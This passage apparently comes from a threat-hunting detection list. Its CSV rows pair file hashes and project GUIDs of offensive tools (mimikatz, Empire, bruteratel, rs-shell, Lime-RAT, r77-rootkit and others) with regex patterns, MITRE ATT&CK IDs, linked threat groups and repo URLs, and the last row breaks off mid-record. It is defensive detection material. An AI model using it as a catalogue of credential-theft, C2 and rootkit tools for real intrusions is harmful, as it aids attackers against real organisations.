"*866e5289337ab033f89bc57c5274c7ca*",".{0,1000}866e5289337ab033f89bc57c5274c7ca.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","30310" "*8672d46e879f704b4b41a401c1a0aae5e6365f18a798a1fbaa4b1a8e711db34b*",".{0,1000}8672d46e879f704b4b41a401c1a0aae5e6365f18a798a1fbaa4b1a8e711db34b.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","30311" 
"*8675e85e11afabcb4173d5943317f9c92df9148b646ee334c0915be2ce074905*",".{0,1000}8675e85e11afabcb4173d5943317f9c92df9148b646ee334c0915be2ce074905.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30312" "*8680150c1ffa19441c8a6594c6f7f89e6ad9867915a37563013e0b987e21f319*",".{0,1000}8680150c1ffa19441c8a6594c6f7f89e6ad9867915a37563013e0b987e21f319.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","cve-2019-0708","10","10","N/A","N/A","N/A","N/A","30313" "*868876b4a458094304af704caecdff99cac8db78f3185db609801ecbd09e3e58*",".{0,1000}868876b4a458094304af704caecdff99cac8db78f3185db609801ecbd09e3e58.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30314" 
"*868A6C76-C903-4A94-96FD-A2C6BA75691C*",".{0,1000}868A6C76\-C903\-4A94\-96FD\-A2C6BA75691C.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#GUIDproject","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","30315" "*868d0fe76c71f94336e0444d1b4ce6d7bdd2d0c71dcc2befa9ba1a1d3bb6d28f*",".{0,1000}868d0fe76c71f94336e0444d1b4ce6d7bdd2d0c71dcc2befa9ba1a1d3bb6d28f.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","30316" "*8691d8707e22f82e78e2bb5b6c5d8d600c9b0ce70bae4e3cb0b26acfde08cd62*",".{0,1000}8691d8707e22f82e78e2bb5b6c5d8d600c9b0ce70bae4e3cb0b26acfde08cd62.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30319" "*86943e3a790e194a2f76aa2c4ed2832e19fe4e7a45eeebe5f5bc62fd16825bd5*",".{0,1000}86943e3a790e194a2f76aa2c4ed2832e19fe4e7a45eeebe5f5bc62fd16825bd5.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - 
T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","30320" "*8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368*",".{0,1000}8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30321" "*8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368*",".{0,1000}8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for 
red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","30322" "*869618deb6029b6b9825dc2d8e07655476e1673bbf3ff82f54837557055a18b1*",".{0,1000}869618deb6029b6b9825dc2d8e07655476e1673bbf3ff82f54837557055a18b1.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30323" "*86965e72a87bd5b0fc8a897c6736b7a57ddd9d3ba5232a5ba626e3f16fec59e2*",".{0,1000}86965e72a87bd5b0fc8a897c6736b7a57ddd9d3ba5232a5ba626e3f16fec59e2.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30324" "*869e5207ba18cdc96d8d3ea5e90c7cf02611804929e416c1622c6072ebcc93a6*",".{0,1000}869e5207ba18cdc96d8d3ea5e90c7cf02611804929e416c1622c6072ebcc93a6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30326" "*86b4924004cdef5e49cdc9ca7cbd2d8be156b8e8f41eceee92492cc315103eb8*",".{0,1000}86b4924004cdef5e49cdc9ca7cbd2d8be156b8e8f41eceee92492cc315103eb8.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","30328" "*86b62609337b5c5c46a2f007f4b5126679728016c0095938646365d495c80a39*",".{0,1000}86b62609337b5c5c46a2f007f4b5126679728016c0095938646365d495c80a39.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","30329" "*86c1800ab9c9f90d5d5ce81a1f1daae1446cdb98686c59b4d5336216725bfb8e*",".{0,1000}86c1800ab9c9f90d5d5ce81a1f1daae1446cdb98686c59b4d5336216725bfb8e.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","#filehash","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","30332" 
"*86c2b33a1b4eace0a52da1e4ca7371de14c15ea2551b6a1d1c4ba2735d5cb565*",".{0,1000}86c2b33a1b4eace0a52da1e4ca7371de14c15ea2551b6a1d1c4ba2735d5cb565.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30333" "*86c9741c985ac8e026364c31af6c288c88e4d36d34321be5adb26c595d3f6675*",".{0,1000}86c9741c985ac8e026364c31af6c288c88e4d36d34321be5adb26c595d3f6675.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30335" "*86dc38ec63d7ddfab38fe655ac2296f328b1fcf43a070bad92cb6c1d3d721d49*",".{0,1000}86dc38ec63d7ddfab38fe655ac2296f328b1fcf43a070bad92cb6c1d3d721d49.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","30336" "*86dce81496e79c16628d56c2a4b9c0ef2d22a5de0b3f84394b306f2705a18829*",".{0,1000}86dce81496e79c16628d56c2a4b9c0ef2d22a5de0b3f84394b306f2705a18829.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","30337" 
"*86dd7c02ed1f529e5c2ec48b1da08d2570769caaa8250aaf5c4438e2aa5558a6*",".{0,1000}86dd7c02ed1f529e5c2ec48b1da08d2570769caaa8250aaf5c4438e2aa5558a6.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","30338" "*86dfbd71a69913b1a1a5303da9a7cbe612bdcf798717ab9db54cf876b589a03f*",".{0,1000}86dfbd71a69913b1a1a5303da9a7cbe612bdcf798717ab9db54cf876b589a03f.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","30339" "*86e37a3b78826bd1c9ebd6b6c65eab9e81261af8f18abe8fda8311ce500e4316*",".{0,1000}86e37a3b78826bd1c9ebd6b6c65eab9e81261af8f18abe8fda8311ce500e4316.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30340" "*86F8C733-F773-4AD8-9282-3F99953261FD*",".{0,1000}86F8C733\-F773\-4AD8\-9282\-3F99953261FD.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","30344" "*86f965be880424c4cee7e1701532b5531da9b10db1c430f289c68b13edbb33f7*",".{0,1000}86f965be880424c4cee7e1701532b5531da9b10db1c430f289c68b13edbb33f7.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30345" "*86fc2c94f8fa3938e3261d0b9eb4836be289f8ae*",".{0,1000}86fc2c94f8fa3938e3261d0b9eb4836be289f8ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","30346" "*86FC4B74-3B12-4C72-AA6C-084BF98E5E9A*",".{0,1000}86FC4B74\-3B12\-4C72\-AA6C\-084BF98E5E9A.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","30347" "*86FF6D04-208C-442F-B27C-E4255DD39402*",".{0,1000}86FF6D04\-208C\-442F\-B27C\-E4255DD39402.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz GUID project","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - 
Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30348" "*8704db81460c783dfafccc4414e9346aa6eeadcfd09984c26e5f1e4e895238d3*",".{0,1000}8704db81460c783dfafccc4414e9346aa6eeadcfd09984c26e5f1e4e895238d3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30350" "*870816a0e737187219a0d5034b0dc9d492763b27bff3443fb291bf226a83cc33*",".{0,1000}870816a0e737187219a0d5034b0dc9d492763b27bff3443fb291bf226a83cc33.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30352" "*8708e2f8c867cf8fda8303837364b2b0184cfa6984febd6c218dc92ee318ea55*",".{0,1000}8708e2f8c867cf8fda8303837364b2b0184cfa6984febd6c218dc92ee318ea55.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30353" "*87135ab4-4cf7-454c-8830-38eb3ede1241*",".{0,1000}87135ab4\-4cf7\-454c\-8830\-38eb3ede1241.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#GUIDproject","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","30355" "*8714f9c15c56b5a6aebb5e90fe59a2f952df8f0759d776e851a1064f159e89a0*",".{0,1000}8714f9c15c56b5a6aebb5e90fe59a2f952df8f0759d776e851a1064f159e89a0.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","30356" "*8719279d2e1abc87d952b144cca5724b9e513958ddacd679624cef890618880e*",".{0,1000}8719279d2e1abc87d952b144cca5724b9e513958ddacd679624cef890618880e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30357" "*871e9cbecbcdcd82c1a0b696923ef45b8225351e9294ba8086658a28f8b9ac94*",".{0,1000}871e9cbecbcdcd82c1a0b696923ef45b8225351e9294ba8086658a28f8b9ac94.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD 
DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30358" "*87221cdeec621e8f4b489b84dbffb6910c7aaa9e4beba96a8d8419626bf1a3b3*",".{0,1000}87221cdeec621e8f4b489b84dbffb6910c7aaa9e4beba96a8d8419626bf1a3b3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30359" "*87230dfc37d3e1c054f985f31d348b6d7ff459d976085843859e226d8723d720*",".{0,1000}87230dfc37d3e1c054f985f31d348b6d7ff459d976085843859e226d8723d720.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30360" "*87243dc6506269a0a678c529ba9717e9c810cc83f563f92833f177e5c516703d*",".{0,1000}87243dc6506269a0a678c529ba9717e9c810cc83f563f92833f177e5c516703d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30361" "*872ee783ea0fc1ed1d646611c77a424568a0a90f0d7b5a0dc430f248a0b824ee*",".{0,1000}872ee783ea0fc1ed1d646611c77a424568a0a90f0d7b5a0dc430f248a0b824ee.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - 
T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","30362" "*8736fa868de0d4514330dab361a3d4ccebd81ccfe7df2003d419aef14849b2fe*",".{0,1000}8736fa868de0d4514330dab361a3d4ccebd81ccfe7df2003d419aef14849b2fe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30363" "*873b9cdf08884f8406ff6d65e56cbfd2a46c56bcb4eb789fb9e85c34907fd748*",".{0,1000}873b9cdf08884f8406ff6d65e56cbfd2a46c56bcb4eb789fb9e85c34907fd748.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30365" "*873f95ecce406d76193e9b9b29b8ee05df1089de9f40f47b222e661263e6a56b*",".{0,1000}873f95ecce406d76193e9b9b29b8ee05df1089de9f40f47b222e661263e6a56b.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation 
